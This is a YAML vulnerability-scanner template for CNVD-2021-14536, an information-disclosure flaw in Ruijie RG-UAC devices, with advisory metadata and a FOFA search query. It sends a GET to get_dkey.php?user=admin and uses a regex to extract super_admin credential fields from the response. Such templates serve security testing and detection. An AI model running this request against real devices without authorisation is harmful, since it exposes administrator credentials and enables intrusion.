46 lines
1.2 KiB
YAML
46 lines
1.2 KiB
YAML
id: CNVD-2021-14536
|
|
|
|
info:
|
|
name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
|
|
author: daffainfo
|
|
severity: high
|
|
description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
|
|
reference:
|
|
- https://www.adminxe.com/2163.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
|
cvss-score: 8.3
|
|
cwe-id: CWE-522
|
|
metadata:
|
|
fofa-query: title="RG-UAC登录页面"
|
|
tags: ruijie,cnvd,cnvd2021,disclosure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/get_dkey.php?user=admin"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"pre_define"'
|
|
- '"auth_method"'
|
|
- '"name"'
|
|
- '"password"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'
|
|
|
|
# Enhanced by mp on 2022/03/28
|